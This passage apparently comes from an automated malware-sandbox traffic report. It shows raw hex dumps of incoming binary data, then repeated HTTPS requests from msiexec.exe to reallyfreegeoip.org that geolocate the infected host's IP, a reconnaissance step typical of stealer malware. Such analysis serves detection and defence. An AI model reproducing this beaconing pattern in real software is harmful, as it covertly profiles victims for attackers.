e7 8f bf 07 e2 f3 57 6b d8 14 35 95 Data Ascii: B1\.fZEZaGwj&'l;Z9!\(Fzg,^n)9?pjzgdW9lAR>QFslmT_;Zj]:5T0k,g$<jjTebs\cj{l\?nSpTd>-`JGUE1%1Zng&Wk5
2025-01-10 22:11:24 UTC	1390	IN	Data Raw: a2 20 36 d2 7c be 73 62 de f0 99 17 86 3c d6 9f f1 40 41 47 94 18 4c 9e fd 34 11 01 99 5a e3 75 ec 7b 96 58 f1 6f 6b 77 f3 30 6f 01 00 88 6c c6 92 ea 6f 27 e0 cb 9b 4c eb 45 75 58 11 86 37 74 98 92 34 6e d7 b8 7b 6d 0e a5 08 e5 62 29 e0 87 fc 13 8c 3e 93 a5 28 62 3f bc 4e bd c8 2f 68 32 b4 18 b2 8a 8c c3 1a 13 3f 32 e9 b2 f3 4f 1c b6 07 a3 64 1e e2 5d a1 44 77 94 7e 2c 76 91 ae f2 93 ae 71 08 ba ea c2 16 c8 01 9f 2c 3f ea 42 17 30 31 b3 61 ad 68 a8 1d 9e 92 4e f3 70 b0 8a 67 c6 3f 01 90 ef 10 68 de 6a 27 81 21 65 68 e4 68 e1 ec f9 73 52 6b 3e 18 a8 0e 08 05 95 bf 07 03 e5 ff 51 35 6e b5 7b 86 1f 1f ae d5 e2 92 b1 fe c8 92 37 f1 cb 57 95 9c d7 d7 d8 2f 06 1b 6a 5d ef b1 e1 f5 f4 59 8a e5 f0 94 9f 6d fa 1c 41 93 0f 3f 62 58 7e 8f 1e be 30 5e 95 be 97 99 93 Data Ascii: 6\|sb<@AGL4Zu{Xokw0olo'LEuX7t4n{mb)>(b?N/h2?2Od]Dw~,vq,?B01ahNpg?hj'!ehhsRk>Q5n{7W/j]YmA?bX~0^
2025-01-10 22:11:24 UTC	1390	IN	Data Raw: 16 68 85 f1 07 ca de 9e c5 d1 89 3c d2 a8 a1 6f 7a ee 98 eb 78 87 36 c5 88 e0 80 f0 ff b1 30 72 9e ec 24 6d af 99 72 8b 75 fd 6a 24 e0 f7 6f 61 77 f3 08 d2 33 00 88 68 b4 e7 c0 19 57 f6 e9 1a 6c eb 43 63 a6 38 e2 32 65 97 ab e2 e1 97 b8 05 43 2b b3 7e a5 5f 2b 90 df ab 3b 0d 38 31 8a 29 e2 7b af 48 a8 6c 33 40 41 e5 0a b2 ee 5a 85 27 13 39 96 bf 6b 8d 09 16 9e c2 01 41 0e 90 53 71 44 07 3c 48 30 7c 1b 90 c8 93 af 50 6d 0b 15 d2 1c d7 67 ba 3b 1d 5e 53 10 55 56 96 79 d5 e1 80 1d ee 34 04 2c 58 04 80 67 dd 9a 56 75 8d c9 0a f6 ae 85 a9 5e 17 7d ff ca b9 b1 a2 73 58 72 4f ad 97 18 02 75 fa a7 1a 8e a1 d7 18 34 4b a9 7b 0a 1a 1f ae 5f 85 85 99 4c d9 8c 2c 47 c6 0b e7 6f de d7 75 0c 22 02 14 40 c7 85 e5 57 db 50 e7 ce db f6 ef cf d5 d9 3f b3 0f 3f 66 84 6f 93 Data Ascii: h<ozx60r$mruj$oaw3hWlCc82eC+~_+;81){Hl3@AZ'9kASqD<H0\|Pmg;^SUVy4,XgVu^}sXrOu4K{_L,Gou"@WP??fo
2025-01-10 22:11:24 UTC	1390	IN	Data Raw: 36 c7 c8 31 d1 2c 92 a1 97 7d 94 a0 eb 7f e1 d4 f1 1f 73 ac 2d ac 56 ad 6f 77 60 ba fe 65 2b 20 c5 f2 42 74 5b ec 94 12 29 c2 ec 2e 74 b8 bb 41 64 35 fd 60 f8 a6 e7 1d de 60 f3 78 0e 24 17 a0 d8 c6 84 c8 bb 02 f8 b3 68 63 eb 39 d7 7d 20 8f 0f 74 92 96 8a c6 8d ca 50 6f 2b c3 d8 ff 1b 29 90 a5 ae 30 9a 10 47 80 3f 16 7a 9c 4e b5 6a 0a 58 37 e5 0a b8 fa a4 fd 25 13 39 94 dd 89 ff d6 0b b6 73 7f 5e 04 90 24 9b 0d 07 36 51 26 4e 62 ae f2 93 ab 7c 20 c8 15 d4 16 66 b3 9f 13 23 5e 42 1d 29 b7 96 51 bd 9f bd 17 30 30 6b ea 58 7a bd 67 cc 99 56 e9 9f c9 0a c8 32 04 a9 54 6f 7e 10 cb da bc e8 56 74 24 3d e7 d7 18 08 74 ce b6 75 a2 f7 d7 68 97 4b a8 21 1f 0c 1f d4 5f 85 8a c3 0b d6 8c 56 47 c6 0a eb a4 d1 d7 01 0c 22 01 18 53 c4 85 91 57 db 51 eb c5 d8 f6 9b cf d5 Data Ascii: 61,}s-Vow`e+ Bt[).tAd5``x$hc9} tPo+)0G?zNjX7%9s^$6Q&Nb\| f#^B)Q00kXzgV2To~Vt$=tuhK!_VG"SWQ
2025-01-10 22:11:24 UTC	1390	IN	Data Raw: c1 6d 01 71 e1 61 eb f0 47 1e 36 6a 14 c2 44 54 a0 84 6b 27 97 dd 01 db c6 e6 00 1b 89 36 d8 76 ad 44 78 c2 8e f3 01 e9 fc c5 82 ea 5c 2e fd 85 66 78 9e ec 2a 56 60 99 5a e3 1a 31 60 f9 89 f1 7e 70 09 c9 08 ac 05 7e b3 6c c6 80 b1 a5 27 e0 cb f4 a1 eb 49 7f 58 28 e0 26 78 fd 5c 28 e3 9d b8 6a 60 44 7c 7a d7 64 29 4e bf 98 3b b8 38 31 8a 2c 0f 7a 94 2c b9 6a 00 ae 40 e5 0a b2 fa a4 fd 2f 13 39 94 be c8 8f 09 6c a0 2b 80 41 04 9a 36 4d 45 14 22 4a 23 54 e7 ef f2 93 b2 d9 5e c8 15 d3 33 ae d1 1b 2d 17 2e e0 32 2d bb 22 79 df 95 1f 38 f6 42 98 e5 58 74 28 42 d5 e3 1c 8a 9d cd d8 fb 00 f7 82 57 65 18 4c ef d2 e7 d9 73 58 7c 82 4f 8b 6a a5 63 eb d0 a5 2b 94 d7 18 3f 7d aa 77 9d 0c 1f da 8f 37 83 b1 88 cf a4 a7 e5 e3 19 83 62 d0 c4 13 bf 11 22 bc 78 c7 85 f7 dd Data Ascii: mqaG6jDTk'6vDx\.fx*V`Z1`~p~l'IX(&x\(j`D\|zd)N;81,z,j@/9l+A6ME"J#T^3-.2-"y8BXt(BWeLsX\|Ojc+?}w7b"x

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	50005	104.21.112.1	443	3192	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:11:27 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 22:11:27 UTC	855	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:11:27 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1861876 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wnn1ZENncqiOn9fF9QcaFfvYOEuSUf6w1dqe2AMgPGR4tA%2BxQZgXOZ9SkSom40jSxN%2BtoOSz7mZUnoHoU50Fpzq3u%2B4kuGG6CL5tuOFa0Rn52YTkHQgDIjgshWMtMMTG9HDttINB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900000bfc84dc34f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1467&min_rtt=1460&rtt_var=562&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1922317&cwnd=181&unsent_bytes=0&cid=ef72f282a1072d06&ts=151&x=0"
2025-01-10 22:11:27 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	50006	104.21.112.1	443	3192	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:11:28 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-10 22:11:28 UTC	859	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:11:28 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1861877 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RsCnSMon4zZs3pv7WjQDPMY2x4GkXUmi5TrCsMfoRf7s3iY1Hb%2BU4%2BPaajIUQQmtwfVBk4vLs3Ufz8EGmwwBdTdiZXE%2FHIDOS6%2BjHn%2BGCgz8ajiqfPyZXuZWXpa4EyYuI0P06KYZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900000c4f8ca424b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1574&min_rtt=1573&rtt_var=592&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1845764&cwnd=248&unsent_bytes=0&cid=9ae4d38291e1f610&ts=146&x=0"
2025-01-10 22:11:28 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	50008	104.21.112.1	443	3192	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:11:29 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 22:11:29 UTC	859	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:11:29 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1861878 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bguBoqx8IYTgZsTcfWGVHKZ01NRxfe2%2FFkEZ5G1CjMw9DC2gJhaGqqFh5ChM%2BIn%2FGBIN16GZudkk8hc340ojZ3nfVNL2wG6anDlTqI8lSMP8hw%2Fl59YJzp%2BqmlUOHH71nWcmr4GL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900000cd3d8c727b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2609&min_rtt=1988&rtt_var=1987&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=419781&cwnd=234&unsent_bytes=0&cid=bb38b666859d4e19&ts=183&x=0"
2025-01-10 22:11:29 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	50010	104.21.112.1	443	3192	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:11:30 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 22:11:30 UTC	859	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:11:30 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1861879 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hfJmCIy5fx0tPjX1kF4JRWqzCuov1HE7rQyaAGvBxdTj7ACU%2BE1wWHMedwt7t1nu%2FMW%2B8inWi8pGLr8Gx%2BlCUIBSvcHa35kO1QmQLvvuaJ4pI57oerIB8KL9IoHec7Oxxqc3X%2F5x"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900000d5cf76c34f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1494&min_rtt=1474&rtt_var=592&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1787025&cwnd=181&unsent_bytes=0&cid=a53382a17dd2094d&ts=137&x=0"
2025-01-10 22:11:30 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	50012	104.21.112.1	443	3192	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:11:32 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 22:11:32 UTC	855	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:11:32 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1861881 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xk1bsH9gv0PKVtdovgETsMxgEKAmvoQf6SrXsaToCIRxslcXxKxQ0gTrivps4ctchFU%2F%2BktIwuLsXC6HIsbjIOBORAfJTZQZceRK0mymCbSHWvMY%2BDnOghPqSUDGhPdGSkoCmoHd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900000de5bd043b3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1577&min_rtt=1572&rtt_var=600&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1809169&cwnd=203&unsent_bytes=0&cid=f264b1f156e7eb12&ts=152&x=0"
2025-01-10 22:11:32 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	50014	104.21.112.1	443	3192	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:11:33 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 22:11:33 UTC	861	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:11:33 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1861882 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=44WeL21RS%2F9xWhNEw%2B%2BdBd2r8nnqxHzIEU9T5LNleYPNtNp6CC5YZK9XooiWShhozoaB%2BSMlOol0sIKYgIEBA%2BpQjcRyVBWWqO8Kn3ctUbG7mV%2FS6CRDQk840iuwyRUoAUcDlF98"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900000e67ce5424b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1638&min_rtt=1612&rtt_var=623&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1811414&cwnd=248&unsent_bytes=0&cid=4d2ea3a3a1d70b18&ts=143&x=0"
2025-01-10 22:11:33 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	50016	104.21.112.1	443	3192	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:11:34 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 22:11:34 UTC	853	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:11:34 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1861883 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PXbayfb%2BgM8dOFWy7GjHFGjPZsPx1isRF1nGr7xyEHdqMbE3EsGw52DRwdl8WxvouvWZlAo0adftlGEHrW%2F1JVk6M7W4OOZ6k3rtvElX6pZ8KpGMpEL7IG4jB2Sbds6st5nV5I0e"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900000eed981424b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1583&min_rtt=1576&rtt_var=605&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1787025&cwnd=248&unsent_bytes=0&cid=cbedae779a360901&ts=137&x=0"
2025-01-10 22:11:34 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	50018	104.21.112.1	443	3192	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:11:36 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-10 22:11:36 UTC	857	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:11:36 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1861885 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RAqbkSSc7phM6Ng8HkHFpIUlIz1oSysv3HN20GYxRvQ9HPl4mvhcdgC6%2BQtErvZ0Omz0hnNzkbiSxVC3nO1W2LHW0uh0x%2FLeACc5Uyb%2B7jPC1%2BqXMfHNy0yTG2E3J6CFx9RRBLtZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900000f6cc3643b3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1577&min_rtt=1572&rtt_var=600&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1809169&cwnd=203&unsent_bytes=0&cid=4b109997414fcbd9&ts=127&x=0"
2025-01-10 22:11:36 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 